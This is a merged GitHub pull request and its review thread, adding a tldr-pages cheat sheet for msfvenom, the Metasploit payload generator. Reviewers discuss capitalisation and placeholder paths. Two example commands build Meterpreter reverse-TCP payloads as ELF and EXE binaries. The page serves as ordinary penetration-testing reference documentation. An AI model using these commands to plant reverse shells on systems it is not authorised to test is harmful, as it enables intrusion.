### PR TITLE
msfvenom: add page

### PR DESCRIPTION
**Pull request by Jab2870**
- [x] The page (if new), does not already exist in the repo.
- [x] The page is in the correct platform directory (`common/`, `linux/`, etc.)
- [x] The page has 8 or fewer examples.
- [x] The PR title conforms to the recommended [templates](/tldr-pages/tldr/blob/master/CONTRIBUTING.md#commit-message).
- [x] The page follows the [content guidelines](/tldr-pages/tldr/blob/master/CONTRIBUTING.md#guidelines).
- [x] The page description includes a link to documentation or a homepage (if applicable).

### CODE REVIEW

File: pages/common/msfvenom.md [hunk 1]
```diff
@@ -0,0 +1,24 @@
...
+
+- List formats:
+
+`msfvenom -l formats`
+
+- Show payload options:
+
+`msfvenom -p {{payload}} --list-options`
+
+- Create an elf with a reverse tcp handler:
```
Comment (agnivade) [inline pages/common/msfvenom.md]: You mention elf here, and exe in the next example. Both are not an apples-apples comparison. elf actually compares to pep for windows. I would recommend to say - Create an elf binary with a ...

File: pages/common/msfvenom.md [hunk 2]
```diff
@@ -0,0 +1,24 @@
...
+
+`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > reverseTcpElf`
```
Comment (agnivade) [inline pages/common/msfvenom.md]: Let's use path/to/binary instead of reverseTcpElf

File: pages/common/msfvenom.md [hunk 3]
```diff
@@ -0,0 +1,24 @@
...
+
+- Create an exe with a reverse tcp handler:
+
+`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > reverseTcp.exe`
```
Comment (agnivade) [inline pages/common/msfvenom.md]: Let's use path/to/binary.exe instead of reverseTcp.exe

File: pages/common/msfvenom.md (hunk 1 above)
Comment (Jab2870) [reply pages/common/msfvenom.md]: I know there are slight differences although this particular tool doesn't have the ability to export to a pep. I have made the change now

File: pages/common/msfvenom.md (hunk 2 above)
Comment (Jab2870) [reply pages/common/msfvenom.md]: No problem, I have made that change

File: pages/common/msfvenom.md (hunk 3 above)
Comment (Jab2870) [reply pages/common/msfvenom.md]: Done this as well

File: pages/common/msfvenom.md [hunk 4]
```diff
@@ -0,0 +1,24 @@
...
+
+- List formats:
+
+`msfvenom -l formats`
+
+- Show payload options:
+
+`msfvenom -p {{payload}} --list-options`
+
+- Create an elf binary with a reverse tcp handler:
```
Comment (sbrl) [inline pages/common/msfvenom.md]: Shouldn't `elf` be in capital letters, like this?
```suggestion
- Create an ELF binary with a reverse TCP handler:
```

If I do `file /bin/bash`, ELF is in caps. Also, `tcp` should probably be capitalised too.

File: pages/common/msfvenom.md [hunk 5]
```diff
@@ -0,0 +1,24 @@
...
+
+`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > path/to/binary`
+
+- Create an exe with a reverse tcp handler:
```
Comment (sbrl) [inline pages/common/msfvenom.md]: Same here.
```suggestion
- Create an EXE with a reverse TCP handler:
```

File: pages/common/msfvenom.md [hunk 6]
```diff
@@ -0,0 +1,24 @@
...
+
+`msfvenom -l formats`
+
+- Show payload options:
+
+`msfvenom -p {{payload}} --list-options`
+
+- Create an elf binary with a reverse tcp handler:
+
+`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > path/to/binary`
```
Comment (agnivade) [inline pages/common/msfvenom.md]: Wrap path/to/binary with tokens (`{{}}`)

File: pages/common/msfvenom.md [hunk 7]
```diff
@@ -0,0 +1,24 @@
...
+
+- Create an exe with a reverse tcp handler:
+
+`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > path/to/binary.exe`
```
Comment (agnivade) [inline pages/common/msfvenom.md]: Same as above

**Comment by pxgamer** [comment]
Hi @Jab2870, I've pushed a commit to this PR that applies the remaining trivial changes. I hope you don't mind.

File: pages/common/msfvenom.md [hunk 8]
```diff
@@ -0,0 +1,24 @@
+# msfvenom
+
+> Manually generate payloads for metasploit.
+> More information: <https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>.
+
+- List Payloads:
```
Comment (agnivade) [inline pages/common/msfvenom.md]: One last thing: is Payloads supposed to start with capital P ?

**Pull request merged**